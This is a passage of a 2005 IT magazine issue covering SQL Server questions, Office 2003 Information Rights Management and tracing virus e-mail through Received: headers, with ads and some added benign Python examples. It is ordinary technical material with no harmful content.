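    assert sum(o.count for o in owners) == checked, "report totals do not add up"
    for finding in suspicious_owners(owners, infer_domain_sid(owners)):
        print(finding)
```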


Winter 2005 9 


If You Deal With These: Viruses, Worms, Critical Updates, Trojans, Security Patches, Malware.
Then You Need This: Winternals Recovery Manager.

Lately you’ve been faced with a painful choice: install Windows patches without testing and risk damage to your systems; or test every critical update and risk infection in the meantime. Winternals Recovery Manager eases the pain of either option. Whether your systems are damaged by malicious code or rendered inoperable by faulty patches or updates, Recovery Manager quickly and easily restores your machines to a working state. With its secure repair and diagnostic environment, you’ll solve problems, via the network, from the convenience of your own desk. No system is immune to attacks. But with Recovery Manager, recovery can be quick and painless.

Learn More! 1-800-408-8415 www.winternals.com

© 2004 Winternals Software LP. All rights reserved. Winternals and Winternals Recovery Manager are registered trademarks of Winternals Software LP.



QUESTIONS & ANSWERS

SQL Server Express, Encrypting Data, and More
Edited by Nancy Michell

Database Sizer Tools

Q: Where can I find a database sizer tool that can be used for large SQL Server databases?

A: You should start with the Scalability and Very Large Database Resource Web site at www.microsoft.com/sql/techinfo/administration/2000/scalability.asp. There you’ll find sizing tools, links to case studies, best practices, and more.

The Microsoft offering, DataSizer, is included in the BackOffice Resource Kit, along with a few other tools, including:

A data simulator
A database generator
The SQL Namespace Browser (for SQL Namespace objects)
A Visual Basic to T-SQL Converter
SQL Synchronization Tools

Read more about the resource kit at www.microsoft.com/resources/documentation/sql/7/all/reskit/en-us/part6/sqc08.mspx. Dell and HP also have online hardware sizing estimates for SQL Server (including the equipment they recommend for your particular application).

Q: Is it possible to connect to a SQL Server 2005 Express Edition instance using the SQL 2000 Query Analyzer? If yes, how do I refer to the Express instance?

A: The SQL Server Express blog (blogs.msdn.com/sqlexpress/archive/2004/07/23/192044.aspx) discusses this and other questions related to the beta release of SQL Server 2005 Express Edition. Connecting to the Express Edition from a downlevel client consists of four steps: making sure the Express Edition is running correctly, enabling the necessary protocols for SQLEXPRESS (the Named Pipes and TCP protocols), restarting the Express Edition, and finally starting the SQL Browser service with the net start sqlbrowser command.

SQL Server 2000 System Table Map

Q: Where can I get a copy of a SQL Server system tables map?

A: The system tables map can be found at www.microsoft.com/sql/techinfo/productdoc/2000/systables.asp. The file is an HTML Help file that lets you drill down into each kind of table to discover its child tables, column names, data types, and their descriptions. Figure 1 shows the first page of the interface.

Figure 1 System Tables (SQL Server System Tables Map: Backup Tables in the msdb Database; Replication Tables in Each User Database; System Tables in the Master Database Only; Replication Tables in Each distribution Database; Database Maintenance Plan Tables in the msdb Database; System Tables in Every Database)

Import Data from Text

Q: What’s the best way to import data from text files into SQL Server where a mix of inserts and updates is required?

A: Using a worktable is one way to do this. Bulk-load features in SQL Server only provide fast insert capabilities. If you have control over the process that creates the text files, it might be better to create two files—one with inserts and another with updates only. This way you can bulk insert the new rows using bulk copy and use a worktable approach for updates.

However, the best all-around way to do this is to use Data Transformation Services (DTS). It can handle the mix of inserts and updates more elegantly and more efficiently than any other method, and it provides the same benefits as using Bulk Copy Program (BCP) and worktables.
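The worktable approach from the answer above, as an added example that is not from the column: sqlite3 stands in for SQL Server, the text file and the target table are constructed, and executemany stands in for the bulk load; the UPDATE uses a correlated subquery so it runs on any SQLite, where on SQL Server the same step is usually written as UPDATE ... FROM customer JOIN work.

```python
# Added example, not from the column: the worktable approach with sqlite3 standing in for
# SQL Server. The text file is constructed; executemany stands in for BCP / BULK INSERT.
import csv
import io
import sqlite3
from typing import Dict, List, Tuple

TEXT_FILE = """\
id,name,credit_limit
1,Contoso,5000
2,Fabrikam,9000
4,Northwind,1500
"""

def load_text(text: str) -> List[Tuple[int, str, int]]:
    """Rows as they would arrive from the text file: ids 1 and 2 exist already, 4 is new."""
    return [(int(r["id"]), r["name"], int(r["credit_limit"]))
            for r in csv.DictReader(io.StringIO(text))]

def merge_via_worktable(conn: sqlite3.Connection, rows) -> Dict[str, int]:
    """Bulk-load into a worktable, UPDATE the rows that already exist, INSERT the rest."""
    cur = conn.cursor()
    cur.execute("CREATE TEMP TABLE work(id INTEGER PRIMARY KEY, name TEXT, credit_limit INTEGER)")
    cur.executemany("INSERT INTO work VALUES (?, ?, ?)", rows)
    # Update step: correlated subqueries keep this portable across SQLite versions.
    cur.execute("""
        UPDATE customer
           SET name = (SELECT w.name FROM work w WHERE w.id = customer.id),
               credit_limit = (SELECT w.credit_limit FROM work w WHERE w.id = customer.id)
         WHERE id IN (SELECT id FROM work)""")
    updated = cur.rowcount
    # Insert step: only the worktable rows with no matching target row.
    cur.execute("""
        INSERT INTO customer(id, name, credit_limit)
        SELECT w.id, w.name, w.credit_limit
          FROM work w
         WHERE NOT EXISTS (SELECT 1 FROM customer c WHERE c.id = w.id)""")
    inserted = cur.rowcount
    cur.execute("DROP TABLE work")
    conn.commit()
    return {"updated": updated, "inserted": inserted}

def demo() -> dict:
    """Constructed target table, then the merge; returns the counts and the final rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE customer(id INTEGER PRIMARY KEY, name TEXT, credit_limit INTEGER)")
    conn.executemany("INSERT INTO customer VALUES (?, ?, ?)",
                     [(1, "Contoso", 1000), (2, "Fabrikam Inc", 9000), (3, "Tailspin", 700)])
    result = merge_via_worktable(conn, load_text(TEXT_FILE))
    result["rows"] = conn.execute(
        "SELECT id, name, credit_limit FROM customer ORDER BY id").fetchall()
    return result

if __name__ == "__main__":
    print(demo())
```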


Cancel Long Queries

Q: What’s the best way to terminate long-running queries launched from ASP.NET? The queries could be against the relational SQL databases or against online analytical processing (OLAP) cubes.

A: To begin, run the query on its own thread, asynchronously for example; then use the Cancel method for the ADO.NET or ADOMD.NET command object.

There is no difference between the Cancel method for ADO.NET and ADOMD.NET. Both send a request to the server (through MSOLAP or directly to SQL Server) to cancel the currently running command. What is sent to the server depends on the underlying library being used to access SQL Server. Ultimately, the request is not sent in XML; it is sent as a Tabular Data Stream (TDS) token that instructs the server to cancel the connection’s currently running query. The API responsible for doing this might be called from SQLClient, OLE DB, ODBC, or DB-Library, but ultimately they all resolve to the same thing: a TDS that instructs the server to terminate the current user’s query.

Note that this does nothing to the thread per se, and this doesn’t work against the XML for Analysis (XMLA) SDK. XMLA will attempt to cancel queries in SQL Server 2005 by sending the cancel request to the server, but this is not guaranteed to be an immediate operation.

Consider not including such a large dimension in the cube. Why put the users in a position where they need to cancel? To avoid this, you can build a virtual cube and remove the offending dimension.

Q: I have a SQL Server 2000 SP3 database schema which is a build of Table A with a foreign key to Table B. Because the data in Table B is sensitive, I keep it encrypted, but that’s not secure enough for my needs. I am looking for a best-practice solution to be able to hide the relationship between the two tables—even from the database administrator of the system.

A: Database administrators sometimes encrypt the data inside a SQL Server database. Usually this is the wrong path to take. If you build a secure box, audit it, and protect access with tight access control, there is really no point in encrypting the data itself. This creates many issues including overhead, sorting, stored procedures, and more.

Furthermore, there is no way to “encrypt” the database schema. That said, you can hide the data and the objects from the database administrator by using explicit deny and not giving him permissions as owner. However, using deny complicates your database design while offering no real advantages beyond what auditing access and controlling System Administrator role membership will provide. Consider the fact that the majority of the most sensitive data in the world resides on mainframe databases without encryption.

If you really must implement encryption, even though threat modeling will show how useless it is, at least do it with SQL Server 2005. With the .NET integration of this upcoming version, it will help you minimize the performance hit.


Max Worker Threads

Q: What value should the Max Worker Threads in SQL Server be set to in order to support 3,000 concurrent users?

A: By default the Max Worker Threads setting is 255, which means that up to 255 worker threads are allowed to be created. The default setting of 255 works well most of the time. This does not mean, though, that you can only establish 255 user connections. A system can have thousands of user connections (which are essentially multiplexed down to 255 worker threads) and, in general, users do not perceive any delays. In such a case, only 255 queries can run concurrently, but this is multiplexed down to the number of available CPUs, so the concurrency is only a perception anyway, regardless of the number of configured worker threads.

If you configure a number of worker threads to a value that is greater than the default, it is almost always counterproductive and slows performance because of scheduling and resource overhead. Only increase this setting under very unusual circumstances and when rigorous methodical testing demonstrates that it is useful to do so. Knowledge Base article 319942 (“Determine Proper SQL Server Configuration Settings” at support.microsoft.com/?kbid=319942) explains the issue.

Q: Is there a way to calculate the amount of system resources that would be used when increasing the Max Worker Threads setting from 255 to 500?

A: You should calculate memory consumption at 0.5MB per thread, but you should first try to define what problem you’re trying to solve. Increasing this setting will waste 512KB of virtual memory address space for each additional worker thread. It’s quite common for 255 worker threads to service thousands of user connections. There is no hard affinity between Unified Messaging Server (UMS) workers and user connections.

Unfortunately, there isn’t a lot of good information out there on how UMS works. SQL Server 2000 Books Online contains useful information about Max Worker Threads and performance (../Books/adminsql.chm::/ad_config_09wu.htm). You can determine for sure whether a lack of worker threads is the cause of any of your bottlenecks by simply checking dbcc sqlperf(umsstats) during the slowdowns. Some basic diagnostics such as Profiler traces and Perfmon logs collected during the slowdowns would be useful.

Thanks to the following Microsoft professionals for their technical expertise: Nader Albussam, Rashid Jean-Baptiste, Sasha (Alexander) Berger, Christian Bolton, Tom Carey, Robert Dorr, Brian Goldstein, Cindy Gross, Ken Henderson, Abdy Iman, Umachandar Jayachandran, Dinesh Krishnamoorthy, Ross LoForte, Han Pin Loke, Simona Marin, Akshai Mirchandani, Josh Moody, Maxwell Myrick, Savitha Padmanabhan, Ward Pond, Venkata Popuri, Stephen Quinn, Simon Rapier, Gandhi Swaminathan, Kadri Umay, Madhusudhanan Vadlamaani, Eric Weaver, Gary Zaika, and Ning Zhu.


YOUR VPN ACCESS. YOUR SECURE KEY STORAGE.
YOUR NETWORK ACCESS. YOUR SECURE CERTIFICATE STORAGE.
YOUR WEB ACCESS. YOUR SECURE PASSWORD STORAGE.
YOUR EMAIL ACCESS & CONFIDENTIALITY. YOUR SECURE KEY GENERATOR.
YOUR COMPUTER BOOT & FILES PROTECTION. YOUR USERS’ SELF-ENROLLMENT KEY.

It’s your digital identity organizer. Just one secure device for all your passwords, keys, and certificates.

North America: 1-800-562-2543, 1-847-818-3800, eToken.us@eAladdin.com
UK: +44-1753-622-266, eToken.uk@eAladdin.com | Germany: +49-89-89-4221-0, eToken.de@eAladdin.com
Benelux: +31-30-688-0800, eToken.nl@eAladdin.com | France: +33-1-41-37-70-30, eToken.fr@eAladdin.com
Israel: +972-3-6362313, eToken.il@eAladdin.com | Japan: +81-426-607-191, eToken.jp@eAladdin.com
Spain: +34-91-375-99-00, eToken.es@eAladdin.com | Asia Pacific: +852-9166-8605, eToken@eAladdin.com
International: +972-3-6362222, eToken@eAladdin.com

©2004 Aladdin Knowledge Systems, Ltd. All rights reserved. Aladdin is a registered trademark and eToken is a trademark of Aladdin Knowledge Systems, Ltd. All other company and product names are trademarks or registered trademarks of their respective owners. Cisco, Cisco Systems, and the Cisco Systems logo are registered trademarks or trademarks of Cisco Systems, Inc. and/or its affiliates in the US and certain other countries.


OFFICE 


Information Rights Management in Office 2003 
Alok Mehta 


Today’s knowledge workers deal with sensitive information all the time. This information comes in a variety of formats such as Microsoft Word, Excel, PowerPoint®, and e-mail documents, and it must all be protected from unauthorized access and distribution. For a long time, there has been a need for a technology that can encrypt this kind of information, allowing access to authorized persons only, and enforcing those rights restrictions everywhere that a document goes. In addition, authors should be able to define the duration for which recipients can read a document, as well as whether they can print, forward, edit, extract its contents, or save an unprotected version.

It should also be possible to extend these restrictions to other documents as well. In other words, restrictions should be policy-based, which in turn should be template-based, so that organizations can easily define custom policies. Finally, this access control should integrate into applications already in use by these organizations.


IRM to the Rescue

Information Rights Management (IRM) is a new feature of Microsoft Office 2003 designed to enhance collaboration methods by allowing the restrictions previously discussed to be placed in Word 2003, Excel 2003, PowerPoint 2003, and Outlook 2003 documents. To this end, IRM uses encryption, permissions, and ownership to restrict unauthorized access.

IRM relies on Active Directory and Microsoft Windows Rights Management Services (RMS)—a new service offered in Windows Server 2003—and extends RMS to Microsoft Office 2003. RMS handles the licensing, machine certification/activation, user enrollment, and administrative functions. RMS is the engine on which IRM runs. RMS in turn relies on Windows Server Active Directory and uses Microsoft SQL Server to store configuration data. For more about RMS, see the sidebar “The Foundation of IRM.”

On the desktop, creating or viewing protected documents requires an RMS-enabled application. See the sidebar “Requirements to Set Up IRM and RMS” for more detailed information.

Alok Mehta, PhD, is the CTO and Senior VP of AFS Technologies Inc. in Weston, MA where he is in charge of technology research and development. Alok has published several research papers on component-based software engineering and Web development. Reach him at amehta@afs-link.com.


IRM is an information protection technology that offers persistent file-level protection. Once permission for a document or e-mail message has been restricted with IRM, these restrictions will always travel with the document or the e-mail message as part of the contents of the file in order to prevent sensitive information from being printed, forwarded, or copied by any unauthorized individuals.

In this column, I will explore the IRM feature and how RMS works in the background. I’ll also briefly look at how to use IRM in Word 2003, Excel 2003, PowerPoint 2003, and Outlook 2003 from the IT professional’s point of view. Refer to Figure 1 for an overview of how RMS and IRM interact. It’s important to note that RMS and IRM are not information security per se, but rather information protection and policy enforcement. This can of course be a component of one’s information security strategy.

E-mails that contain confidential information can be easily forwarded to a competitor or a vendor.

Figure 1 RMS and IRM Interaction (Windows Server 2003: RMS, Membership/Ownership, Configuration Database; RMS Licensed and Registered User/Machine; policy persistent with IRM documents)

Additional Information

RMS and IRM
www.microsoft.com/technet/prodtechnol/office/office2003/maintain/rmsirm.mspx

RMS
www.microsoft.com/downloads/details.aspx?familyid=be/fae0c-2db2-4f7f-8aa1-416fe1b04fb1

Windows RM Client
www.microsoft.com/downloads/details.aspx?familyid=3115a374-116d-4a6f-beb2-d6eb6fa66eec

RMS SDK
www.microsoft.com/downloads/details.aspx?familyid=2dfcafb9-3e7b-4f70-b6d3-aecc965cd598

RMS Client SDK
www.microsoft.com/downloads/details.aspx?familyid=863dadce-d648-4d50-9392-b4faca34a0a8

Rights Management Add-On for Internet Explorer
www.microsoft.com/windows/ie/downloads/addon


E-mail is now one of the primary methods of communication within and between institutions. E-mails that contain confidential information can be easily forwarded, even accidentally, to a competitor or a vendor. Rights-protected e-mail helps protect against leaks, especially the accidental type.

IRM can be used in Microsoft Office Outlook 2003 to help prevent e-mail forwarding, cutting, pasting, copying, editing, or printing. Protected messages are always encrypted, and when the sender assigns rights to the message, Outlook 2003 enforces the prescribed rights by disabling the restricted commands so that the receiver can not forward, edit, copy, or print its contents. In addition, Office 2003 documents attached to protected messages inherit the same restrictions and are protected too.

Here’s an example of how IRM works with Outlook 2003 to implement privacy.

John is an executive who needs to send his team a private e-mail with a Word 2003 document attached. Using RMS, his company has created an Organization Private template that automatically applies all of the appropriate rights as predefined by John’s IT group. John selects the template for his e-mail message, which also imparts the same set of restrictions to the attached Word 2003 document. The Organization Private template says that only employees within the organization can read the information. As employees open the e-mail and the attachment, RMS-enabled Outlook 2003 and Word 2003 enforce the rights and restrictions on the document. Also specified by the Organization Private template, employees cannot cut, copy, save, or edit either the e-mail message or the attached Word document to an unsecured format. If they try to digitally share this information outside of the organization, the unauthorized recipient will not be able to open the e-mail or the Word document.

Now imagine that a team member sends a request to John asking permission to share the e-mail and attachment to an outside team that is working on the same project. The outside team uses a hosting provider for its RMS solution and is a trusted partner of John’s company’s RMS solution. John applies the appropriate rights for the outside team and then sends the e-mail to members of that team, who can then view the e-mail and the document.


Office 2003 documents can be protected on a per-user or group basis based on Active Directory. Each user or group can be given a set of permissions according to the rights defined by the document owner. These rights allow the user to read, change, or have full control over the document.

IRM disables commands that the particular recipient does not have the right to execute. In addition to the aforementioned restrictions, owners can also set document expiration dates (which can be extended). After expiration, the document still exists, but it cannot be opened by anyone other than the owner.

If an unauthorized recipient attempts to open a protected document, a message is displayed to inform the user that it is rights-protected. The document owner has the option of providing their e-mail address in that message so the unauthorized recipient can request rights to access the document.

The following scenario illustrates how IRM works to implement privacy.

In RMS-enabled Word 2003, Steve uses the permissions option to set the rights for a document that he needs to share with another user, Nancy, in their branch office. Steve posts his document to an internal file server. Nancy then receives an e-mail from Steve pointing her to the document’s location. According to the rights that Steve set for the document, Nancy can view and edit it for one week only. She downloads the document to her laptop and opens it up for review. Because the rights are persistent, they remain with the information, even if the laptop is not connected to the LAN. After a week, Nancy determines that she needs additional time to review the document. As she can no longer open the doc, she requests that Steve grant her more time to continue reviewing it. Steve grants the permission by extending the expiration date and reposts the document. Nancy downloads this updated version and is able to continue reviewing the document as defined by the usage rights.

Enforcement of rights is performed at the application level. Office 2003 is currently the only application from Microsoft that can create rights-protected docs. Microsoft provides a free Rights Management Add-on for Internet Explorer that will enable users without Office 2003 to view a rights-protected document. This add-on is available for download from www.microsoft.com/windows/ie/downloads/addon.


If you take a look at Figure 2, you’ll see how a document or e-mail is protected with RMS. The steps illustrated in the figure are explained here:

1 The author receives a client licensor certificate from the RMS server the first time they apply rights protection to a document. This step enables offline publishing of rights protected documents in the future.

2 Using an RMS-enabled application, the author creates a file and defines a set of usage rights and conditions for that file. A publishing license is then generated that contains the usage policies. The application then encrypts the file with a symmetric key, which is then encrypted with the public key of the author’s RMS server. The key is then inserted into the publishing license and the publishing license is bound to the file. Only the author’s RMS server can issue use licenses to decrypt this file. The author then distributes the file.

Figure 2 RMS Protection (RMS-enabled Word 2003 Author Uses IRM; Configuration Database; RMS-enabled Word 2003 Recipient; labels: create rights-protected files and containers, license and distribute rights-protected documents, acquire licenses to decrypt rights-protected documents)

3 A recipient receives a rights-protected file through any distribution mechanism and opens it using an RMS-enabled application or browser. If the recipient does not have an account certificate on the current computer, the user will now be issued one.

4 The application sends a request for a use license to the RMS server that issued the publishing license for the protected information. The request includes the recipient’s account certificate, which contains the recipient’s public key, and the publishing license, which contains the symmetric key that encrypted the file. A publishing license issued by a client licensor certificate includes the URL of the server that issued the certificate. In this case, the request for a use license goes to the RMS server that issued the client licensor certificate and not to the actual computer that issued the publishing license.

5 The RMS licensing server validates that the recipient is authorized, checks that the recipient is a named user, and creates a use license.

IRM and RMS help protect information through persistent usage policies, which remain with the information no matter where it goes.


During this process, the server decrypts the symmetric key using the private key of the server, re-encrypts the symmetric key using the public key of the recipient, and adds the encrypted session key to the use license. This step ensures that only the intended recipient can decrypt the symmetric key and thus decrypt the protected file. The server also adds any relevant conditions to the use license, such as the expiration of an application or operating system exclusion. When the validation is complete, the licensing server returns the use license to the recipient’s client computer.

After receiving the use license, the application examines both the license and the recipient’s account certificate to determine whether any certificate in either chain of trust requires a revocation list. If so, the application checks for a local copy of the revocation list that has not expired. If necessary, it retrieves a current copy of the revocation list. The application then applies any revocation conditions that are relevant in the current context. If no revocation condition blocks access to the file, the application renders the data, and the user may exercise the rights they have been granted.

This process is essentially the same whether the recipient is within the publishing organization or outside of it. The recipient is not required to be inside the author’s network or domain to request a use license. All that is required is a valid account certificate for the recipient and access to the licensing server that issued the publishing license. RMS can be set up to enable external sharing of rights-protected documents. Users can share information with other trusted users over the Internet. This deployment offers the same level of protection as an intra-company RMS deployment because an RMS server must license the rights that are attached to a rights-protected file.

Deploying RMS

The process of deploying RMS consists of the following steps:

Hardware Setup See the hardware, software, and infrastructure requirements described in www.microsoft.com/technet/prodtechnol/office/office2003/maintain/rmsirm.mspx.

RMS Server Setup Install, enroll, and register the RMS server software. During the enrollment process, the administrator installs RMS server software on the root server. The version of RMS installed on the server and the organization’s URL is collected, and a public/private key pair is created. The server sends the public key along with the RMS version and URL information to the RMS Server Enrollment Service in a request for a RMS Licensor Certificate. The RMS Server Enrollment Service returns the RMS Licensor Certificate. Enrollment using the RMS Server Enrollment Service is required for at least one server within every RMS system. Servers added subsequently to the RMS root cluster use the same RMS Licensor Certificate. When you add a new server to an existing root installation or licensing-only server cluster, the new server is not explicitly enrolled because it takes on the entire existing configuration of the cluster.

RMS server(s) can be configured along 
with Windows Load Balancing Services 
(WLBS), and there are several possible to- 
pologies of RMS server configurations. Fig- 
ure 3 shows a typical RMS topology. 

RMS Client Setup Every client computer that will participate in the RMS system must be set up so that it is established as a trusted entity within the system. Client computer setup consists of verifying the presence of the RMS Client component and activating the client computer. After a client computer is set up, the infrastructure is in place to permit users with RMS-enabled applications to publish and consume rights-protected data. Each client computer must have the RMS Client component installed. This component is available from the Windows Update Catalog or from the Microsoft Download Web site (www.microsoft.com/downloads). In the next version of Windows, the client component will be built into the operating system. Software deployment tools such as Microsoft Systems Management Server (SMS) can ensure that clients have the component installed, or you can rely on the installation of an RMS-enabled app to initiate the request to the Windows Update Catalog for the component. This component is required by RMS-enabled apps and is used for the client activation process.

Register RMS Users When a user attempts to use RMS (for example, by using IRM in Microsoft Office 2003 programs), the following occurs. First, the machine obtains a certificate that activates it as a computer capable of creating protected content. The user then obtains a certificate that associates him or her with that computer, and enables the creation of protected content.

Figure 3 RMS Topology (diagram; labels recovered: RMS-enabled application, secondary RMS servers with load balancing for licensing and certification, configuration database, ADS database)

IRM deployment depends upon RMS deployment. As RMS is deployed, IRM deployment is as simple as installing the RMS Client at the desktop and deploying Office 2003. The client machine and each user then receive a certificate allowing IRM usage as I described in the previous subsection "Register RMS Users."

Conclusion

To protect sensitive information such as customer data, financial reports, product specifications, and confidential e-mail messages, you need a strategy. Information Rights Management and Windows Rights Management Services help protect information through persistent usage policies, which remain with the information no matter where it goes. If you intend to use Windows Server 2003, you should consider an RMS/IRM solution. RMS is simple to set up and IRM very easy to use, so I highly recommend these two technologies as part of your overall data security solution.

Requirements to Set Up IRM and RMS

You will need Microsoft Windows Server 2003 with Windows Rights Management Services (RMS) to enable IRM in Office 2003. RMS is designed to make the most of existing infrastructure investments by using Active Directory discovery and Windows NT LAN Manager (NTLM) authentication. At the server level, the following is needed to run RMS:

1. Windows Server 2003 with RMS server software. RMS is a new service for Windows Server 2003 Standard, Enterprise, Web, and Datacenter editions.
2. Internet Information Services.
3. Windows Server Active Directory service (Windows Server 2000 or later). Active Directory accounts are used to acquire and use licenses.
4. A database, such as Microsoft SQL Server, to store configuration data.

To take advantage of this new technology, you must also install the RMS Client. You will need administrative rights to install this client on your computer and ensure it functions properly. The following must be installed at the client machine:

1. RMS Client software.
2. An RMS-enabled application is required for creating or viewing rights-protected content. Microsoft Office 2003 includes four RMS-enabled applications available from Microsoft: Outlook 2003, Word 2003, Excel 2003, and PowerPoint 2003. Microsoft Office Professional Edition 2003 is required for creating or viewing rights-protected Microsoft Office System documents such as spreadsheets, presentations, and e-mail messages.

Other Office 2003 Editions allow designated users to view and edit rights-protected documents if they have been given those rights by the author. They cannot create rights-protected content.

Microsoft also offers a free trial for customers who do not have Windows Server 2003. This service will enable users to share documents and messages with restricted permission using Microsoft .NET Passport as the authentication mechanism, as opposed to Active Directory. Please visit the Office Web site at office.microsoft.com/assistance/preview.aspx?AssetID=HA010721681033 for the free trial service of IRM.


How It Works: The E-mail Header

R'ykandar Korra'ti

As a network administrator, you've just seen fifty copies of the same e-mail virus sent to your users. How do you know which machine is infected? Is it someone inside your own company or someone external you can block?

Often, you can isolate it to a single machine by analyzing the one portion of the header your own e-mail server provides. Figure 1 shows a real-life example (all real names have been changed).

The important data is in the Received: line. Each time a server receives an SMTP message, it is supposed to add a new Received: line at the beginning of the header block. The topmost line will have been added by your server.

My e-mail server added the topmost line in this example; since there are no other Received: lines further below it, it is probably safe to assume that it was delivered directly to my system by an embedded mini-SMTP engine running on an infected machine. Had there been more than one Received: line, the first one might have been a relaying mail server. As servers are not as likely to be infected as clients, you may want to skip down to the second entry.

The Received: line provides information in this format:

Received: from <info supplied by sender - untrustworthy> (<info provided by our server - trustworthy>) by <our server> with <protocol> <message ID> {for <email address>}; <date>

Your concern should lie with the information provided by your server; that's the data in parentheses following the "from" information supplied by the sender. The sender-provided information will almost always be invalid in virus and spam mail, so you can just ignore it.

In this example, the information added by my server consisted only of the IP address of the machine handing me the message, 69.66.109.194. That's the least amount of information you'll get. There may also be a machine name before the IP address, but still within the parentheses. If present, it is also trustworthy information and saves you the next step.

Two tools are needed to discover and verify the name of this machine and the owner of its domain: nslookup (host, on some operating systems) and whois. Both nslookup and host provide DNS lookups against hostnames or IP addresses:

C:\>nslookup 69.66.109.194
194.109.66.69.in-addr.arpa domain name pointer dwtt-00-0194.dsl.cascadiatelecom.net.

I now know the sender is in the domain cascadiatelecom.net. I've already learned that Cascadia Telecom supports reverse-DNS lookups, although not all network providers do. For those that don't, you must apply the whois tool.

To oversimplify a bit, whois provides information about domains rather than individual hosts. This tool is generally used to identify the owner of a particular domain, as shown in Figure 2. Whois can also be used to identify the owner of an IP address, or range of IP addresses, when you don't know the name of the domain. A network of top-level whois servers exists for this purpose. These are whois.apnic.net (Asia-Pacific), whois.arin.net (Americas), and whois.ripe.net (Europe), covering different geographical domains. As a rule of thumb, test against the server for your geographical area first; if that fails, keep going until you find one that works. I already know my example is in North America, but if I didn't, that's where I'd start (see Figure 3).

With any batch of virus mail received, you'll see a cacophony of sender-provided misinformation. But with a little analysis, you'll often find most of it actually came from one or two infected (and easily blocked and disinfected) machines.

R'ykandar (Dara) Korra'ti, a glass sculptor, lives in Seattle with her partner Anna, and is postmaster for a small co-op ISP. Having shipped many e-mail products, she retired from Microsoft in 1999 to focus on her art career.

Figure 1 Analyzing E-mail

Received: from microsoft.net ([69.66.109.194])
    by lodestone.microsoft.net with ESMTP
    id HAA19424
    for <sample@microsoft.net>; Fri, 5 Mar 2004 07:30:22 -0800
From: firstname.lastname@sample.state.ia.us
Message-Id: <200403051530.HAA19424@lodestone.microsoft.net>
To: sample@microsoft.net
Subject: Re: Your bill
Date: Fri, 5 Mar 2004 09:36:35 -0600
X-Priority: 3
X-MSMail-Priority: Normal

Figure 2 The Domain Owner

Domain Name: MICROSOFT.COM
Registrar: TUCOWS INC.
Whois Server: whois.opensrs.net
Referral URL: http://domainhelp.tucows.com
Name Server: NS3.MSFT.NET
Name Server: NS1.MSFT.NET
Name Server: NS2.MSFT.NET
Name Server: NS5.MSFT.NET
Name Server: NS4.MSFT.NET
Updated Date: 23-jun-2004
Creation Date: 02-may-1991
Expiration Date: 03-may-2014

Figure 3 The IP Address Owner

OrgName: Cascadia Telecom
NetRange: 69.66.0.0 - 69.66.255.255
CIDR: 69.66.0.0/16
NetName: CASCADIA-TELECOM
NameServer: AR.CASCADIATELECOM.NET
NameServer: HE.CASCADIATELECOM.NET
OrgTechName: Cascadia Telecom NOC
OrgTechPhone: +1-877-555-1212
OrgTechEmail: noc@cascadiatelecom.net
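The analysis above can be automated for a whole batch of messages. The following added example (not part of the column) parses the Received: line in the format the column gives, keeps only the part our own server wrote, insists that the topmost line was stamped by our server, and tallies which handing-off IP addresses the batch actually came from. The sample messages are constructed after Figure 1; the regular expression and helper names are this example's own.

```python
"""Pick the trustworthy part out of Received: headers and group a batch of virus
mail by the machine that actually handed it to our server.

Added example, not part of the original column. It does by code what the column
does by hand: the sender-supplied name after "from" is recorded but not trusted,
the parenthesised part written by our own server (optional reverse-DNS name plus
[IP address]) is what we act on, and only the topmost Received: line is used
because that is the one our server added. Sample messages are constructed."""
import re
from collections import Counter, defaultdict
from email import message_from_string

# from <claimed> (<rdns?> [<ip>]) by <our server> ...  Folded header lines are
# joined by \s+ so the pattern works on the raw multi-line header value.
RECEIVED_RE = re.compile(
    r"from\s+(?P<claimed>\S+)\s+"
    r"\((?:(?P<rdns>[\w.-]+)\s+)?\[(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\]\)\s+"
    r"by\s+(?P<by>\S+)"
)


def parse_received(value):
    """Split one Received: value into untrusted (claimed) and trusted (rdns, ip) parts."""
    m = RECEIVED_RE.search(value)
    if not m:
        return None
    return {
        "claimed": m["claimed"],   # sender-supplied, untrustworthy
        "rdns": m["rdns"],         # our server's reverse lookup, if it did one
        "ip": m["ip"],             # our server's view of the peer address
        "by": m["by"],
    }


def first_hop(raw_message, our_server):
    """Use the topmost Received: line, and only if our own server wrote it."""
    msg = message_from_string(raw_message)
    received = msg.get_all("Received") or []
    if not received:
        return None
    top = parse_received(received[0])
    if top is None or top["by"].lower() != our_server.lower():
        return None                # header block does not start with our own stamp
    top["hops"] = len(received)    # 1 means it was delivered to us directly
    return top


def sources(raw_messages, our_server):
    """Map each handing-off IP to a message count and the names it claimed to be."""
    counts, claims = Counter(), defaultdict(set)
    for raw in raw_messages:
        hop = first_hop(raw, our_server)
        if hop:
            counts[hop["ip"]] += 1
            claims[hop["ip"]].add(hop["claimed"])
    return counts, dict(claims)


def _msg(claimed, ip, rdns=None, sender="firstname.lastname@sample.state.ia.us"):
    """Constructed message in the shape of Figure 1 (names and addresses made up)."""
    seen = f"{rdns} [{ip}]" if rdns else f"[{ip}]"
    return (
        f"Received: from {claimed} ({seen})\n"
        "\tby lodestone.microsoft.net with ESMTP\n"
        "\tid HAA19424\n"
        "\tfor <sample@microsoft.net>; Fri, 5 Mar 2004 07:30:22 -0800\n"
        f"From: {sender}\n"
        "To: sample@microsoft.net\n"
        "Subject: Re: Your bill\n"
        "\n"
        "body\n"
    )


# Three messages claim three different origins but all arrive from one address.
SAMPLES = [
    _msg("microsoft.net", "69.66.109.194"),
    _msg("sample.state.ia.us", "69.66.109.194"),
    _msg("mail.example.org", "69.66.109.194"),
    _msg("example.com", "203.0.113.9", rdns="pc9.isp.example"),
]

if __name__ == "__main__":
    counts, claims = sources(SAMPLES, "lodestone.microsoft.net")
    for ip, n in counts.most_common():
        print(f"{ip}: {n} message(s), claimed to be {sorted(claims[ip])}")
```

The reverse lookup and whois steps that follow in the column are deliberately left to the operator: the script only tells you which one or two addresses are worth looking up.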


Dissecting a Successful Campus Integration Project

Theresa Auricchio

The Project:

Two colleges in the City University of New York (CUNY) system needed to implement a student retention system. The system, a client/server application, would sit beside an IBM mainframe.

Challenges:

- The colleges had no existing security architecture, meaning that the network was compromised on a regular basis.
- The colleges also had no operating system standard, so the solution had to work cross-platform. One college used Oracle 9i as its database system, while the other used SQL Server 2000.
- The IT department had no trained personnel available to serve as a project liaison.
- The consultant had to guarantee the integrity of the software and data without the authority or funding to implement additional solutions outside of their own.

The Plan:

